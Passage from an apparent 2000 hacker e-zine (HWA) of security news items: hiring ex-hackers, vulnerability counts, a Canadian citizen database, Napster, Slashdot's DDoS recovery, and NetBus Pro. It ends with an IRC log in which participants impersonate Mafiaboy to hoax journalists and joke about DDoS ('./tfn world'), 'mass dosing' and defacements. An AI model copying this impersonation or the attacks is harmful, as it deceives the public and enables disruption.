stocks, bombs. "I hired several hackers," Lutz says, "the most famous, perhaps notorious, being Mark Abene, a.k.a. Phiber Optik. I brought Mark into the security consulting world by hiring him when he was released from prison. He worked for me for about two years and then started his own company, called Crossbar Security. Mark is a perfect example of the nation's most feared hacker turning around and providing a valuable service to the commercial sector and reaping the rewards that go with it." Lutz says hiring hackers as consultants can be "highly rewarding. This is true for both the clients we serve and... the hackers themselves. Many young, talented hackers are bored and looking for something to do. By providing them with a constructive objective and rewarding them monetarily, we help focus them in a positive direction that keeps them busy and out of trouble." The idea, as Lutz sees it, is to manage them and teach them business skills, not banish or outlaw them. Inquiring minds Could Binney have had an ulterior motive for his statement? IBM has what it calls an "ethical hackers" unit that will, for $15,000 to $40,000, according to the company, "simulate a real intruder's attack, but in a controlled, safe way." IBM's Internet Security Assessments, for $40,000 to $200,000, will tell companies if their Web sites are vulnerable and, if so, shore the sites up. I asked computer security people all over the Net what they would like me to ask Binney. But after initially agreeing to an interview on Feb. 8, Binney changed his mind and has since been unavailable for comment, despite numerous phone calls, messages and e-mails. The questions, though, have value in themselves... Carole Fennelly is a security consultant and partner at Wizard's Keys, a Tinton Falls, N.J., consulting company specializing in computer systems security. Fennelly had three sets of questions: 1.If IBM doesn't use hackers for penetration tests, then what is so special about its test? If it is merely testing for known vulnerabilities using a package like ISS Scanner [which uncovers vulnerabilities likely to be exploited during attempts to attack a network and provides the necessary corrective actions], why should a company pay big bucks for that? Why couldn't companies just run the scan themselves? 2.Has IBM ever encountered a site with really iron-clad security? If so, what did IBM put in the report? IBM can answer that one without naming the company, just as physicians mask the identities of their patients, while still providing the data necessary for studies. 3.When IBM makes recommendations, does it refer the client to a vendor with which it has a partnership? Does it offer to do the work itself? They're not using the audit as a marketing opportunity, are they? Audits can be legitimate opportunities for a company to prove its worth to the client. It can also become a con job targeting overworked and understaffed technical administrators. Sage security advice Matthew G. Devost, a senior information security analyst at Security Design International, a firm providing security consulting services to international corporations and governments, warns against using large firms that offer prepackaged security solutions. "With large consulting or product companies, the security consulting team is often used as a mechanism for pushing other products or services," Devost says. He also cautioned against an assessment team that benefits from future product sales or follow-up implementation support. "Pay close attention to methodology," Devost says. "If a company offers a quote without first understanding your network, their assessment can't really be trusted." Other things that don't bode well, Devost says, are the use of a single commercial product or reliance on assessment tools. Devost says customers should check the qualifications of the security team. "Will the names provided be directly involved in your assessment? Beware the bait-and-switch technique, where a team of senior security engineers is offered up, but replaced by a team of recent college graduates at the last minute." Cast a wide net, Devost says. "There are a hundred reasons why you should avoid using a large consulting company to perform a security assessment... [which] will become apparent only when you broaden the spectrum of firms you solicit for quotes. Pay very close attention to the technical substance of their proposals." So, contrary to what Binney said, with all the problems around the Internet - denial-of-service attacks out of nowhere, computer malfunctions and software vulnerabilities - there is a growing market for reformed hackers, one that's lucrative and fun and, best of all, legal. If you want to respond to this piece, talk to the author, voice an opinion or just tell us how we can improve AnchorDesk UK, come to our TalkBack forums and have your say ... @HWA 214.0 [IND] BUGTRAQ: "Vulnerability statistics database" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.securityfocus.com/frames/?content=/vdb/stats.html This is interesting, but I feel they should have included more relevant information like how many units are in production use and how many units are home or business based etc in this analysis. - Ed Follow url for more stats and graphs etc. Number of OS Vulnerabilities by Year OS 1997 1998 1999 2000 Debian 2 2 29 5 FreeBSD 4 2 18 6 HP-UX 8 5 7 3 IRIX 26 13 8 3 Linux (aggr.) 10 23 84 30 MacOS 0 1 5 0 MacOS X Server 0 0 1 0 NetBSD 1 4 10 3 OpenBSD 1 2 4 2 RedHat 5 10 38 17 Solaris 24 31 34 6 Windows 3.1x/95/98 1 1 46 11 Windows NT 4 6 99 34 @HWA 215.0 [MM] Big Brother has your file ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.canoe.ca/TorontoNews/ts.ts-05-17-0016.html Wednesday, May 17, 2000 Big Brother has your file Huge data bank worries privacy watchdog By SEAN DURKAN, OTTAWA BUREAU OTTAWA -- Big Brother is watching you. The federal government has "a de facto citizen profile" on virtually everyone living in Canada, Privacy Commissioner Bruce Phillips revealed yesterday. The massive data bank, which is vulnerable to misuse, is run by Jane Stewart's Human Resources and Development Canada -- the same department under fire for its handling of $1 billion in job grants. The data bank contains as many as 2,000 pieces of information on each of 33.7 million individuals, Phillips said in his annual report to Parliament. The dossier, which tracks Canadians from cradle to grave and is never purged, includes information about each person's education, marital status, ethnic origin, mobility, disabilities, income tax, employment and welfare history. TAX RETURNS The information is taken from income tax returns, child tax benefits, immigration and welfare files, the National Training Program, Canadian Job Strategy, employment services, employment insurance, job records and the social insurance master file. "Continually centralizing and integrating so much personal data on almost every person in Canada poses significant risks to our privacy," Phillips said. Privacy is further endangered because the information can be given out to non-government researchers, Phillips said. Most Canadians would be surprised to know their tax returns can be shared in this way, he said. HRDC's files are not subject to laws preventing the public release of any individual's information. Phillips said the database is "a hazard" because it creates a temptation for governments to develop profiles, "raising fears that data could be used to make decisions or predictions about individuals ... to the detriment of individual rights." ASSURANCES Privacy commissioners have always assured Canadians there was no such central file. An audit which began two years ago has proved them wrong and Canadians should be concerned, Phillips said. The "extraordinarily detailed" central databank is called the Longitudinal Labour Force File. There are proposals to make the file even more comprehensive by adding data on social assistance recipients from additional provinces and territories, and data from the Canada Student Loan Program, the Canada Pension Plan and the Old Age Security Program. The central file has gradually built up with government reorganization, which has turned HRDC into "a virtual behemoth" that has taken over numerous social, employment and training programs from other departments. Phillips said HRDC has responded to his concerns by saying the data is vital to help it develop policy, manage the effectiveness of its "interventions" and improve programs and service delivery. -=- Ottawa Citizen; http://www.ottawacitizen.com/national/000517/4116449.html Vast database details every Canadian's life Federal watchdog says some files hold 2,000 bits of information Ian MacLeod The Ottawa Citizen The federal government has quietly created a massive computer database with intimate details about millions of Canadians, including income, employment, education and family status, federal Privacy Commissioner Bruce Phillips revealed yesterday. "This is an enormous database with enormous amounts of information about each one of us," the nation's chief privacy watchdog said following the release of his annual report to Parliament on the state of personal privacy in Canada. "Every one of us is covered in this file in one way or another. They have a complete record of you if you've had any contact anywhere with any (of a number of government departments and programs) ... which tells them how your life is progressing." The Longitudinal Labour Force File, managed by Human Resources Development Canada, contains detailed data on 33.7 million living and dead Canadians. Some individual files contain as many as 2,000 bits and pieces of vital personal information, Mr. Phillips said. The labour file was established about 15 years ago by Employment and Immigration Canada and is used to research and evaluate the effectiveness of the federal employment insurance program. The information is gleaned from other government data banks and includes details from tax returns, child tax benefit files, provincial and municipal welfare files, federal jobs, job training and employment programs and services, employment insurance files and the social insurance master file. Mr. Phillips said there are proposals to expand the file to include additional data on social assistance recipients from provinces and territories, the Canada Student Loan Program, the Canada Pension Plan and Old Age Security Program. "Successive privacy commissioners have assured Canadians that there was no single federal government file, or profile about them," said Mr. Phillips. "We were wrong -- or not right enough for comfort. "I don't question that they had, and they have, good reasons for doing this and that it is useful information in terms of improving the quality of their programs. I am not suggesting either that they've done anything unlawful here. They are complying with the strict letter of the law as we understand it. "But there are serious problems here." Although an HRDC Web site contains a brief description about the labour file, Mr. Phillips said much more has to be done to let Canadians know about the extent of the government's surveillance of its citizens. "Transparency and knowledge about what the government is doing is important." A senior HRDC official yesterday defended the file and said the department has been trying to address Mr. Phillips' concerns, including agreeing to purge individual data from the file after 25 years. "We have taken his concerns seriously," said Bob Wilson, HRDC's director-general of evaluation and data development. "We're not unmindful of the privacy concerns surrounding the database. "On the other hand, it's really important to Canadians that we do policy research and evaluation so that we can get programs that meet their needs. So, as in all of these thorny public policy issues, there's a saw-off about where do you draw the line in respect of that." He said specific information in the database is electronically masked to hide an individual's identity and that only a handful of HRDC officials have access to the technological hardware needed to unmask the data. He acknowledged the masked data is sometimes given to private firms for research and analysis. "We're concerned about maintaining the privacy of individuals and we've done a large number of things to protect that," said Mr. Wilson. "We, perhaps not wisely, but nevertheless, have relied on the fact that we've been doing this for 15 years and never had a problem with it, never had even a hint of a (security) breach." Mr. Phillips said he has no reason to believe current government officials are abusing the information contained in the file, though he questions what future officials might do and whether any officials really need all of the information the file contains. In effect, he said, the government is compiling a de facto profile of virtually every citizen in Canada. "My problem here is ... the Privacy Act at the moment is insufficient to prevent these kinds of informational collections," he said. "The Canadian public believes, for example, that when they send their tax information, it doesn't go out of the tax department. Well, in fact, it does, many times and to many places. There's something like 200 informational exchange agreements between Revenue Canada and various other agencies, plus other governments." In the two years since the Office of the Privacy Commissioner found out about the labour file, Mr. Phillips said he has tried, unsuccessfully, to persuade HRDC officials to enact legislation to control the collection, handling and access to the information. "I said years ago, the fear is not Big Brother, it's thousands of little brothers, all of whom have" increasing technological ability to monitor the personal lives of Canadians. "But there is a Big Brother factor as well, and I think the Longitudinal Labour Force File is an example of the kind of thing that modern technology makes possible. We should know about it. We should know they're doing it and they should have to do it under very tightly written legal restraints about the usage of that information." But Mr. Wilson said HRDC officials believe current laws and regulations offer many of the protections Mr. Phillips wants. "We really need to sit down with him to find out exactly what he would like us to do by way of legislative framework," he said. Longitudinal Labour Force File Description: The bank contains all of the following information: Social Insurance Number, sex, date of birth, name and initials of the person. It may contain information on income, periods of employment and unemployment, eligibility of employment insurance and or social assistance, family situation, education, National Training Program courses taken and other employment services received. Consistent Usee: ...It may be provided to private sector firms for planning, statistics, research and situations. @HWA 216.0 [MM] Napster gets tough with Metallica ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.zdnet.com/zdnn/stories/news/0,4586,2568446,00.html Napster gets tough with Metallica fans A Napster message board goes dark after a user posts a hack for banned users. It was either that or go out of business, a company insider said. By Marilynn Wheeler, ZDNet News May 12, 2000 5:11 AM PT Banned Napster users who figured out a way to get back onto the music download site were foiled late Thursday when instructions were removed from a Napster message board. The "Circumventing Napster Bans" user forum was shut down and in its place was a warning from the company after ZDNet News published a link to the forum. "Any posts regarding the circumvention of bans placed by Napster will be deleted and the username will be banned," Napster told visitors to the forum. "The IP will be logged, and a second offense will trigger an IP ban on the individual's account." "The Napster discussion boards are moderated, and they have a policy of removing any user posts related to working around the user blocks regarding Metallica," said Napster spokesman Dan Wool. Doing battle online Last week Metallica, which is suing Napster for copyright violation, produced the names of hundreds of thousands of fans who had traded the band's music online. Napster responded by banning 317,377 users on Wednesday. The ostracized fans complained they'd been tricked into downloading the latest version of Napster, which had installed tracking identification on their computers. Within hours, a way to get back online was posted in a Napster forum. A user who asked not to be identified protested in an Internet Relay Chat with one of Napster's developers. "(The instructions) went down because our PR firm told us to take them down," said the developer, identified as "nocarrier." "Having that information on our boards gives the impression to the world that we support the removal of our lock." Crying censorship "So it was removed," replied the user, "MindRape." "But that's censorship." It's called protecting your company, the developer said. "We will GO OUT OF BUSINESS for s--- like that! Delete the post, or lose the court battle, and you lose your napster! This is reality man!" "You had to do certain things to show you applied effort, but to CENSOR," the user replied. "I dunno man, I think that's Orwellian. Well, good luck." "Thanks. We need it," the developer replied. @HWA 217.0 [IND] The Slashdot DDoS attack: What happened? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by GTO (http://www.g-t-online.com/) http://slashdot.org/article.pl?sid=00/05/17/1318233&mode=thread Posted by CmdrTaco on Wednesday May 17, @10:00AM from the from-the-horses-mouth dept. What follows this introduction is a rough summary of the crazy hell that we endured with the intermittant DDoS[?] attacks we experienced last Thursday through Saturday. I'm sorry it took this long to put this together and tell you what happened, but as these things go, we were too busy trying to solve the problem to waste time talking about it. Big thanks to Andover.Net's Netops PatL, Martin and Liz, as well as Slashcode-wranglers PatG, Chris, Marc, Kurt and CowboyNeal, plus scoop (from freshmeat) and others who chimed in along the way. Tomorrow is part2: A good description of how the new Slashdot @ Exodus works. What follows is more-or-less Pat "BSD-Pat" Lynch's account of the DDoS... Pat is our super 31337 BSD Junkie sysadmin. He wants everyone to know that the timeline below is little screwy, but things are more or less in sequential order. Things might not be exactly perfect, but hey, what do you expect after 30 hours without sleep? Having moved the day before, none of us were truly familiar with exactly how the new hardware would handle the full burden of being 'slashdot.org'. The cluster (known affectionately as The Matrix) had handled its premiere day with flying colors, but we didn't really have an accurate feel of how things would react. Combine this with a couple of extremely high traffic stories posted on both Thursday and Friday, and it took us a awhile to determine that the problems were external, and not a flaw in some new component in the cluster." The Attacks began Thursday morning. Most of it came in the form of SYN floods, from obvious /16's no less, and some /24's. We didn't have any zombie-killing software or a firewall installed because of certain network topology issues. Later on, a second wave came, this closer to 8 or 9pm and the load balancer (an arrowpoint CS-100) died under the load. The DDoS, as far as I could see, was a lot of SYN and Zero port packets coming from various /16's and /24's as well as a bunch of RFC1918 reserved addresses (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16) At one point we reached 109Mbits worth of traffic into our network. Liz and I went back to Exodus and rebooted the Arrowpoint, then the site seemed "ok" for a bit. By 3 in the morning, Liz decided that the PIX (Cisco's firewall) could simply not do what it was supposed to do, so we went back and started building a FreeBSD box as a bridging firewall. just before we went to plug it in, I tried to ssh into the vpn-gate and noticed that nothing was working right: while the site worked, outgoing traffic and source groups on the Arrowpoint was screwed. As if that wasn't enough, two ports died on it already! At some unknown point (time blurs after 30 hours straight!) Martin and PatG show up (thank the gods!) and they force us to go to sleep, they bring the site up outside the Arrowpoint, while Liz and I watch from a hotel room. As of Friday morning, the site is semi-working, but the adsystem can't be updated, and we have no access to the backend servers. I scream bloody murder to Arrowpoint, who eventually shows up to blame the router: a cisco 6509 switch with two RSM/MSFCs. Liz and I do packet dumps and determine it's not the router, the little CS-100 had died the night before, and thats where it all started. The Arrowpoint guy insists we did something to make the Arrowpoint not work (CT: Explicit description of precisely where Liz and and Pat wanted to store the newly deceased Arrowpoint removed to keep things rated PG) By 7 the CS-800 CSS is up we're almost done for the day, but we stay to make sure. By 10pm we're exhausted but stable, although we're running 4 servers on a round-robin DNS while the new load balancer waits. Netops (Liz , Martin and I) regroup, and do reintegration of new Arrowpoint CS-800 and installation of a new FreeBSD Firewall box instead of the PIX during Saturday Afternoon. Slashdot returns to normal. Sysadmins get well-deserved sleep. So that was the story. It was a pretty hellish weekend for everyone involved, but thanks again to those that helped get our ducks back in a row. Again, Part #2 to this (which originally was gonna be run last Thursday, but with all this ddos stuff got pushed aside) is a fairly detailed description of the new Slashdot setup at Exodus, complete with all the changes mentioned above. Fun for the whole family if your family is really into clusters of web servers." @HWA 218.0 [IND] China Executes Bank Manager for Computer Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ News bulletin. May 31, 2000 China Executes Bank Manager for Computer Crime Human rights were thrown out of the window when China executed a bank manager for embezzeling more that 2 million yuan by manipulating computer records. According to China's state run media, Shen and an accomplice were falsifying records and diverting funds into a personal account. The accomplice still remains at large. Full story here. @HWA 219.0 [IND] Data Transmission Pioneer Passes Away ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ News bulletin. May 31, 2000 Data Transmission Pioneer Passes Away Donald W. Davies whose work included leading the team that built one of the first functioning networks using packet data, has passed away at age 75. Credited with coining the term "packet switching", Davies was one of the first people to realize that data needed to be broken into discrete packets and not transmitted as whole files. Davies later began his focus on computer security, conducting studies for teleprocessing systems, financial institutions, and government agencies. His books included "Communication Networks for Computers" in 1973, "Computer Networks and their Protocols" in 1979, and "Security for Computer Networks" in 1984. Full story here. @HWA 220.0 [IND] Canada Agrees to Drop Big Brother Files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ News bulletin. May 30, 2000 Canada Agrees to Drop Big Brother Files In response to public outcry, the Canadian government has agreed to dismantle a large database that held as many as 2000 pieces of information on each of it's citizens. Human Resources Minister, Jane Stewart publicy stated that, "Given public concerns about privacy issues in this era of advanced and constantly changing technology, I have chosen an approach that addresses future threats to privacy." Full story here. @HWA 221.0 [IND] Senate Bill Will Make Minor Computer Hacking a Felony ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/ News bulletin. May 25, 2000 Senate Bill Will Make Minor Computer Hacking a Felony Penned the "Internet Integrity and Critical Infrastructure Protection Act," bill number S. 2448 will make minor computer offenses felonies opening the door for the FBI and Secret Service to investigate. Other bills that the Senate is attempting to sneak by include the further expansion of wiretapping authority, which includes allowing the federal government to seize the house where the offending computer is residing, and making all computer crimes a predicate for wiretaps. Full story here. The United States government is clearly being swept up in the mayhem caused by the ILOVEYOU virus. These bills are repressive and infringe on the rights of all United States citizens. If you find any of this the least bit disturbing, please contact your local Congressman and Senator. @HWA 222.0 [IND] McAfee considers Netbus pro legitimate tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hacking tool slips through McAfee's net McAfee's VirusScan software will no longer detect intrusion by a Trojan Horse-based remote administration tool used by hackers because it considers the product legitimate. NetBus Pro is a commercial tool made by UltraAccess Networks that allows machines to be monitored and files to be accessed. But the product is based on the infamous Trojan Horse called NetBus and has been used illegally by hackers to gain access to systems. McAfee used to report when it detected NetBus Pro in a network, but last week Network Associates, which publishes VirusScan, decided that it would no longer report incidences of NetBus Pro intrusions. Jack Clark, European product manager for Network Associates, said: "McAfee will pick up the NetBus Trojan, but the Pro product is a genuine remote access tool." He said there is no point alerting network managers whenever the tool is used legitimately, adding that the weekly update of the drivers for VirusScan would include a fix to halt some illegal uses of NetBus Pro. "There is a way to hide the code on a user machine," said Clark. "The update will detect if someone attempts to hide their use of NetBus Pro in another file." One of the original authors of the network intrusion tool Back Orifice, who is now a consultant for security adviser @Stake, said the hacker community has welcomed the news. He added that these kinds of decisions were often influenced by legal concerns that rival remote access tools might be scanned out as viruses involving companies in antitrust battles. Judd Spence, chief executive of UltraAccess, said there were many similar software programs that were not scanned by antivirus software. First published in Network News » If you would like to comment on this article email us @ newseditor@vnunet.com @HWA 223.0 [HWA] The Hoax ~~~~~~~~~~~~~~ I debated on wether or not to post this info/log since it has little real news merit but does have some potential social-disobedience overtones to it and is subversive in nature, after discussing it with several people and a reporter who shall remain unnamed it was decided it had merit in its own righ so here it is to peruse and take as you will - Ed One night in the underground... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Two hackers were bored one night and decided to perpetrate a hoax here is an overview of what transpired (Edited) I was almost pulled into the event as it unfolded, my involvement was minimal as i deal with real news not fake news however since I am known some people went ahead and assumed I gave the plans my blessings and included my site/zine without my consent, I asked for it to be removed from the original "press release" and it was. http://www.news.insource.nl/ Mafiaboy houdt chat 19 May 2000 De Canadese Mafiaboy, die schuldig pleitte voor het plegen van DoS aanvallen op diverse grote sites, houd een chat waarbij iedereen hem vragen kan stellen. De chat vindt op 20 mei om 21 uur EST plaats op EfNet in het kanaal #media-event. Daar zal hij alle vragen beantwoorden over wat er met hem is gebeurd en wat er gaat gebeuren. Bron: Frank van Vliet RAW INFO: How it started: [15:00] *** SliPY is now known as Mafiaboy [15:00] ./tfn world [15:01] ppl aren't drunk enough to laugh at that yet [15:02] :) [15:02] give me a few hrs [15:02] tilli get drunk [15:02] hehe [15:02] and really make an ass of myself [15:02] ok [15:02] * MrEreet gets ready to sell tickets and starts work on the promotional website ... [15:03] wanna have some fun? [15:03] should set up a fake news conference and get media online [15:03] well [15:03] the police [15:03] engage net media hype hoax #1 [15:03] are doing a news conference [15:03] about me soon [15:03] another one? [15:03] it will be on cnn/cbc/global/atv (local/national news) [15:04] the rcmp ;/ [15:04] "and there was much rejoicing" [15:04] heh [15:04] i hate the media [15:04] they blow shit out of proportion and stuff [15:04] like calling mafiaboy [15:04] a hacker [15:05] * tekneeq is away: (.) [BX-MsgLog Off] [15:05] *** logistix (x25@mumma-said-knock-you-out.*.uk) has joined #darknet [15:05] bleh.... [15:05] sveditorial@sjmercury.com - SILICON VALLEY.COM [15:05] tips@news.com - C|Net News tips [15:05] paulf@cnet.com - columnist for C|Net NEWS.COM [15:05] patrick_houston@zdnet.com - [15:05] Bob.Sullivan@msnbc.com - M$NBC [15:05] adam.wolf@reuters.com - REUTERS Newswire [15:05] nancy.bobrowitz@reuters.com [15:05] news@pulse24.com - CityTV Toronto [15:05] comments@foxnews.com - FOX news TV [15:05] tips@wired.com - Wired media [15:05] tips@news.com - NEWS.com [15:05] mo@cmp.com - [15:05] start mailing [15:05] heh [15:06] mass invite people to #media-event [15:06] lol [15:07] hehe "#leechasf eats a big fat hairy dick.../join #media-event"... [15:07] TONIGHT MAFIABOY'S UNDERGROUND CYBERGANG THREATENS ATTACKS' [15:07] some would come [15:07] dumbasses [15:07] *** gw4hn sets mode: +o logistix [15:07] heheh [15:07] fuck jennycam made the news [15:08] hehe... [15:08] anyone wanna pull a fake media event? [15:08] and how many times did we take that over [15:08] yeah, but honestly...its jennycam...hehe... [15:08] i'll pose as mafiaboy : Session Start: Fri May 19 15:08:53 2000 Session Ident: Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net) [15:08] no seriously [15:08] u wanna do somethin like this? [15:09] say mafiaboy speaks out etc [15:09] fuck i'm bored enough [15:09] haha [15:09] same [15:09] and i got no life [15:09] heh [15:09] hehe Session Close: Fri May 19 15:11:22 2000 : [15:08] :) [15:08] http://www.lightspeed.de/irc4all/ [15:08] grab yer proxies [15:08] heh [15:08] proxy? heh i'm on a eleet shell [15:08] http://www.cyberarmy.com/lists/proxy/ [15:09] http://proxylist.virtualave.net/ [15:09] http://proxylist.hypermart.net/list.htm [15:09] well [15:09] i'm gonna bot mafiaboy [15:09] there thats like 7k worth some might work [15:09] for a while i think [15:09] hope they don't packet me too bad [15:10] * [crow] is idle, auto-away after 10 mins. (l:On/p:On) [15:10] *** SugarKing (sugaking@*.net) has joined #darknet [15:11] * [crow] is back from the grave (53s) [15:13] *** |eXiSt| has quit IRC (|eXiSt| has no reason) [15:14] *** MrEreet is now known as Mitnick- [15:15] *** Mitnick- is now known as Optik- [15:21] * [crow] is idle, auto-away after 10 mins. (l:On/p:On) [15:21] * [crow] is back from the grave () [15:21] * [crow] is idle, dinner (l:On/p:On) [15:21] * tekneeq is back from the dead. . [15:24] *** Optik- is now known as MrEreet [15:24] **** That beta Ircd code is EXPLOITABLE ***** [15:25] info to come later [15:25] (that isn't a joke) [15:25] cruc [15:25] op me [15:26] *** Cruciphux sets mode: +o tekneeq [15:26] hrm.. [15:26] #media-event massive hoax in planning invite yer buddies we're gonna give CNN something entertaining [15:26] tekneeq: bandwidth came back up...but gotr00t is hrm...fucked up [15:26] pass it on but don't give the game away [15:27] Tutor: ack [15:27] *** tekneeq sets mode: +o Tutor [15:27] yeah i think they locked a MAC into the IP (idiots...) [15:27] but ultrapimpz is up....no DNS tho heh [15:27] .114 and .112 both down...whores.. [15:28] *** SpYrOOt (~anomaizer@*.s3curity.com) has joined #darknet [15:28] *** logistix is now known as aSsBaNdiT [15:28] *** mountd has quit IRC (Ping timeout) [15:31] *** klatch- (i0@*.cybercity.no) has joined #darknet [15:31] *** i0 has quit IRC (Ping timeout: 180 seconds) [15:31] *** klatch- is now known as i0 [15:31] *** LOB_Niall has quit IRC (xchat exiting..) [15:38] *** CodeZero (~code@*.com) has joined #Darknet [15:38] *** ojz (cazper@*.langame.net) has joined #darknet [15:40] *** snake- (snake@*.uno.edu) has joined #darknet [15:42] *** kgb-kid sets mode: +o CodeZero [15:42] cz0 [15:42] wtf [15:43] hum? [15:44] hum what? ;)) [15:45] hi gov [15:49] *** psy_eye (psy_eye@*.yu) has joined #darknet [15:50] #media-event pass it on [15:51] *** psy_eye has quit IRC (SendQ exceeded) [15:52] *** Mafiaboy is now known as SLiPY [15:54] *** CodeZero has quit IRC (Ping timeout: no data for 248 seconds) [15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98) [15:57] *** CodeZero (~code@*.com) has joined #darknet [15:59] *** Shylock_ (juice@*.edu) has joined #darknet [16:00] *** typo_ (typo@inferno.*.edu) has joined #darknet [16:01] *** oxigen (oxigen@*.at) has joined #darknet [16:01] hi oxigen [16:01] alle leet ? [16:02] überleet ;) [16:02] uber alle [16:02] uber alles [16:03] *** m1x (m1x@*.org) has joined #darknet [16:03] cd /tmp [16:03] haha [16:03] cd: command not found [16:03] SWEET [16:03] m1x: all of us joining now ;) [16:03] Hi [16:08] *** Disconnected -=- Meanwhile behind the scenes in the 'control-booth' ... Session Start: Fri May 19 15:41:40 2000 [15:41] *** Now talking in #media-admin [§] Channel [ #media-admin ] Modes [ + ] [15:41] *** MrEreet sets mode: +snt+k pimped [15:42] *** Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net) has joined #media-admin [15:42] *** MrEreet sets mode: +o Mafiaboy [15:42] *** MrEreet changes topic to 'Hack of the millennium secret planning council' [15:42] :) [15:43] *** i0 (i0@*.cybercity.no) has joined #media-admin [15:43] Idle :P [15:43] *** k-rad-bob (mobys_dick@*.cybercity.no) has joined #media-admin [15:43] {} is ok [15:43] he hacked apache.org [15:43] leave the ops just get ppl talking here [15:44] lol [15:44] wut if fbi trace you down [15:44] hehe [15:44] i'll be using a proxy [15:44] I will be here [15:44] wouldnt want to miss it [15:45] *** flatline` (lick@*.euronet.nl) has joined #media-admin [15:45] *** twilight- (vvarder@*.com) has joined #media-admin [15:45] we could start mass dosing and shit to make it big [15:45] ;) [15:45] can i get a short summary of the "plans"? [15:45] i joined in pretty plate :/ [15:45] Mafiaboy, you want me to contact dutch magazines or not? [15:45] the idea of mass defacements crossed my mind but It wasn't my idea [15:45] :-) [15:45] *** Amoeba (webmaster@*.net) has joined #media-admin [15:45] heh [15:45] flatline` yeh [15:46] might want to use an alias so u don't blow your rep though [15:46] i need the e-mail. [15:46] *** SugarKing (sugaking@*.net) has joined #media-admin [15:46] forward it to flatline@*.com plz [15:46] and start thinking [15:46] coz if someone contacts the real mafiaboy ... [15:46] Anyone know wut 9pm est is in norwegian time [15:46] it should be vague [15:47] what kind of hoax is this? [15:47] http://www.timeanddate.com/time/abbreviations.html [15:47] *** Mafiaboy sets mode: +ooo Amoeba flatline` i0 [15:47] *** Mafiaboy sets mode: +ooo k-rad-bob SugarKing twilight- [15:47] *** Mafiaboy sets mode: -o i0 [15:48] *** Mafiaboy sets mode: -o Amoeba [15:48] tanx [15:48] *** Mafiaboy sets mode: +vv Amoeba i0 [15:48] hey! [15:48] no ops? [15:48] maybe we give them too much time [15:49] oh well [15:49] hmm [15:49] tommorow gives them time to check email [15:49] think any media outlets are actually gonna show? [15:49] tommorow nite will be good [15:50] so, what's the plan here? [15:50] well [15:50] 30 media places have been contacted [15:50] they come in [15:50] ask questions [15:50] we give serious answers [15:50] it will be mad fun [15:50] make news and shit [15:50] about what? [15:50] and then we talk aboit [15:50] and then we talk about [15:50] our plan [15:50] what did you tell them? [15:50] to takeover the world [15:50] ;) [15:50] i sent a formal email [15:50] haha [15:50] not lame or anything [15:50] lol [15:51] fwd me the email MrEreet@dok.org [15:51] ya [15:51] it'll be real funny if it makes it [15:51] yeah, forward me what you sent them [15:51] might wanna make the topic a little more interesting [15:51] heh [15:51] heh [15:51] all the @'s will talk about after the questions directed to mafiaboy, me at the time most likely, and then we talk about our plans to take over the world by packetting and all serious fun shit [15:51] where'd Debris go [15:51] and that the rcmp won't keep us down [15:51] he's probably on the fone with mafiaboy [15:51] his sister dated him [15:51] heh [15:51] espen@*.de forward there too [15:52] *** Mafiaboy is now known as SLiPY [15:52] MrEreet: haha, really? [15:52] yeh [15:52] that's fucked [15:52] gotta bot it [15:52] put it on a better host [15:52] till tommorow nite [15:52] so when mafiaboy comes on [15:52] he can use it [15:52] we gotta talk all fake and shit [15:53] is Mafiaboy in jail? [15:53] nah [15:53] not yet [15:53] *** Debris (3223@*.montreal.*.net) has joined #media-admin [15:53] he wont be [15:53] lets call him [15:53] ya [15:53] why? [15:53] too young [15:53] call who [15:53] someone set up a conf [15:53] *** SLiPY sets mode: +o Debris [15:53] oh [15:54] then Juvenile Detention? [15:54] mafiaboy [15:54] haha [15:54] no [15:54] he's at home [15:54] i dunno if they have that shit in Canada [15:54] well what's gonna happen to him? [15:54] Following the surprise plea the judge served the maximum sentence of 240 hours of community work plus one year's probation, restricted use of a computer, and ordered the defendant to deliver a speech at a local high school court on the evils of hacking. [15:54] thats why he is talkin to us. [15:54] mafiaboy lives 5minutes awayfrom me heh [15:54] slipy [15:54] thats j0n [15:54] not mafiaboy [15:54] Debris go get him [15:54] hehe [15:54] h3h [15:54] his parents dont let me in the house [15:54] so someone is going to pose as Mafiaboy? [15:54] my sisters in 3 of his classes [15:54] don't forget to mention as much as you can about the awesome HWA zine [15:55] j/k [15:55] how old is he? [15:55] rofl [15:55] fone [15:55] Debris: he still goes to school? [15:55] mention about my site [15:55] www.g-t-online.com [15:55] he must be, popular, hahahah [15:55] lol cru [15:55] debris [15:55] u sure? [15:55] haha shouldn't have said that [15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98) [15:55] i thought it was mafiaboy [15:55] anyone spamming dalnet and undernet #hackphreak etc? [15:56] SLiPY: different people [15:56] one hacked MIT and NASA [15:56] i lost him [15:56] SLiPY, did you forward that e-mail? [15:57] cruci: are you going to be featuring this in next hwa issue? [15:57] he has too [15:57] flat, whats the email? [15:57] he'd be dumb not to:) [15:57] How We Fooled the Media [15:57] k-rad-bob lol [15:58] SLiPY: flatline@*.com [15:58] I would consider it twice though [15:58] you wouldn't be trusted with wired or anyone else [15:58] I admit i had no news or ideas so when that happens you do what 2600 does and manufacture irc logs to make news [15:58] most likely [15:58] oh someone tell #2600 but don't mention hoax those tight asses will expose it [15:59] lol [15:59] 2600 is 